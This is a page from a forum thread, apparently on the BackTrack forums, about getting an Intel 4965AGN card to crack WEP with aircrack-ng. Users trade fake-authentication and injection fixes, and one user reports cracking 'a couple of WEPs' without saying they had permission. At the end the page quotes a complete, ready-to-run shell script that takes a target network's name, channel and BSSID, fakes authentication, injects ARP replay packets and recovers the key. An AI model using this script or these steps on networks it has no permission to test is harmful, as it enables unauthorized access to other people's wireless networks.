Page 13 of 15 FirstFirst ... 31112131415 LastLast

Thread: 4965 agn

Just burned his ISO

Sorry I'm very noob here, do I have to install compact-wireless or whatever to properly manual fakeauth without the fakeit.sh script?? If so how would I install it?

riahc3

Good to hear. Hope it is easy and includes easside-ng and wesside-ng

Just burned his ISO

does not work for me =/ when i try to fake auth it keeps asking to use this packet and never gives me a result =/. So i think for me the 4956 agn is not working. Any quick fixes guys...its a big thread to read through >_>

thanks =)

Just burned his ISO

Quote Originally Posted by cruisx View Post
    does not work for me =/ when i try to fake auth it keeps asking to use this packet and never gives me a result =/. So i think for me the 4956 agn is not working. Any quick fixes guys...its a big thread to read through >_>
    Fakeauth shouldn't ask if you want to use any packet. How do you fake auth? Using wpa_supplicant or aireplay? Aireplay-ng (I use the latest version) only rarely works for me. I usually use wpa_supplicant (using a script from this forum) which always works.

Just burned his ISO

Quote Originally Posted by silence420 View Post
    Fakeauth shouldn't ask if you want to use any packet. How do you fake auth? Using wpa_supplicant or aireplay? Aireplay-ng (I use the latest version) only rarely works for me. I usually use wpa_supplicant (using a script from this forum) which always works.
    ahh i forget but i will get back to u on that. IT was something like -1 1 -a "XX:XX:XX:XX:XX:XX and so on. I think it was aireplay-ng. I am at work so i will get back to u when i get home. thanks.

Also when i activate the wifi card...is it supposed to identify my driver? cause it says something like unavaiable and beside it it says like thy0. Again sorry for the rather poor description, i kinda forgot what it looked since i have tried it since yesterday.

Just burned his ISO

Quote Originally Posted by Zermelo View Post
    OK, guys, looks like the Devs at aircrack have modified the suite so that now fakeauth WORKS with the 4965 as long as your using an aircrack version 1531 or greater.

VERIFIED, it works. Screenshot:

I suggest everyone with a 4965 or 5100 upgrade their version to the latest svn.

More details on the latter part of this thread:

Go thank Netroller3d at aircrack for his great work.

Ok back home guys, I took can confirm that this works and now backtrack can see my 4965agn and i can use it. Now only problem is that under the #Data coloumn i had around 42 000 and when i tried to use aircrack-ng to get the WEP key on my own router it said failed? Shoudl i wait till the number gets around 100 000? thanks again to anyone that can help.

EDIT: Ok so i got fed up and tried to fix this issue my self. Turns out that it as a fakeauth issue, i used the script pasted on page 4 and then i was able to crack my access point with around 50 000 packets. Actually by the time i figured out to get the pass with aircrack i had around 120 000 packets. For some reason when i tried to do

aircrack-ng NAME-01

no dile showd up so i had to do

aircrack-ng NAME-01.cap.ivs

and then i found my key....

I will post a mini tut later i guess, first i gotta figure out how to put backtrack on usb....re downloading aircrak and making a new script everytime for live cd is a pain.

Just burned his ISO

Talking Hi

Quote Originally Posted by cruisx View Post
    Ok back home guys, I took can confirm that this works and now backtrack can see my 4965agn and i can use it. Now only problem is that under the #Data coloumn i had around 42 000 and when i tried to use aircrack-ng to get the WEP key on my own router it said failed? Shoudl i wait till the number gets around 100 000? thanks again to anyone that can help.

EDIT: Ok so i got fed up and tried to fix this issue my self. Turns out that it as a fakeauth issue, i used the script pasted on page 4 and then i was able to crack my access point with around 50 000 packets. Actually by the time i figured out to get the pass with aircrack i had around 120 000 packets. For some reason when i tried to do

aircrack-ng NAME-01

no dile showd up so i had to do

aircrack-ng NAME-01.cap.ivs

and then i found my key....

I will post a mini tut later i guess, first i gotta figure out how to put backtrack on usb....re downloading aircrak and making a new script everytime for live cd is a pain.
    I'm really looking forward to your mini tutorial, it's time that there is a universal method to get the 4965 working with backtrack.
    Google will give you a bunch of sites with how to backtrack->usb.

I'm going to put mine on usb too this afternoon.
    Any progress on the tutorial?

Kind regards, dr. ferre.

Just burned his ISO

Quote Originally Posted by Araquera View Post
    intel 4965agn works same as Dr greens modified usb live, like a charm
    Modified usb version for 4965agn ?? where can i get it?

greets

Just burned his ISO

Quote Originally Posted by macakmica View Post
    Many people (including me) had problems with this wireles adaptrer set(old kernel).

Last night Ive downloaded BT4 BETA and with great happines can confirm that IT WORKS.

MSI GX700 laptop.

Already craked couple of WEPs.
    I tried everything to get mine working on bt4 beta
    im getting iv's but very slow and when i try to fakeauth it says success but then with the aireplay -3 attack it keep on reading and 0 arps and 0 ACKS !!!

Can u post the way u followed to make ur card working!!!

Default very nice

Nice script. Adapted it to Ubuntu 9.04 and it works very well!

Quote Originally Posted by David Barchiesi View Post
    Ok, I have written a really stupid script that should cover all the WEP cracking needs. It is my first script so therefore I am open to criticism. It only asks for the BSSID, ESSID and the channel of the target AP. It does not handle bad input or anything particular. Lets see what you guys think.
    Code:
    #!/bin/sh
    #Aircrack-ng script by David Barchiesi
    #Created for use under Backtrack 4 beta with an Intel 4965AGN wireless card.

#REMOVE ANY OLD CONFIGURATION AND PREPARING SYSTEM
    rm auth.conf
    rm aircrack.conf
    mkdir WEP
    killall NetworkManager
    killall knetworkmanager
    killall wpa_supplicant
    clear

#AP BSSID, ESSID AND CHANNEL INPUT
    echo "Aircrack-ng script by David Barchiesi"
    echo "For use with Backtrack 4 beta and Intel 4965AGN"
    echo ""
    echo "Enter the ESSID of the Target Network: "
    read targetname
    echo "Enter the channel the Target Network is on: "
    read channel
    echo "Enter the BSSID of the Target Network: "
    read targetmac
    echo 'network={ \n ssid="'$targetname'" \n key_mgmt=NONE \n wep_key0="fakeauth" \n }' > auth.conf
    clear

#STARTING AIRMON-NG TO SET CARD TO MONITOR MODE
    echo "Setting card to Monitor mode"
    airmon-ng start wlan0 $channel
    sleep 2
    clear

#STARTING AIRODUMP-NG IN ANOTHER KONSOLE WINDOW
    echo "Done. Starting airodump-ng in new window"
    konsole -e airodump-ng --channel $channel --bssid $targetmac --write /root/WEP/$targetname mon0 &
    echo "Press enter when ready to do a Fake Authentication"
    read enter

#FAKE AUTHENTICATION VIA WPA_SUPPLICANT
    echo "Starting Fake Authentication..."
    wpa_supplicant -c auth.conf -i wlan0 -Dwext -B
    echo "Fake Authentication succesful. Check airodump-ng screen to make sure."
    echo ""
    echo "Press enter to start Injecting"
    read enter
    clear

#STARTING INJECTION IN A NEW KONSOLE WINDOW
    konsole -e aireplay-ng -3 -b $targetmac mon0 &
    echo "Injection started"
    echo "Make sure #DATA is increasing under airodump-ng."
    echo "If not then either the card is not injecting or the AP is too far away."
    echo ""
    echo "When you have enough IVs press enter."
    read enter
    clear

#REMOVING mon0
    killall wpa_supplicant
    clear
    echo "Stopping mon0..."
    airmon-ng stop mon0
    sleep 2
    clear

#DECRYPTING KEY VIA AIRCRACK-NG
    echo "About to start aircrack-ng to decrypt password"
    sleep 2
    aircrack-ng /root/WEP/$targetname-01.cap
    As usual copy/paste, make executable then ./<filename> in a terminal.
    Good luck, hope it helps...

Page 13 of 15 FirstFirst ... 31112131415 LastLast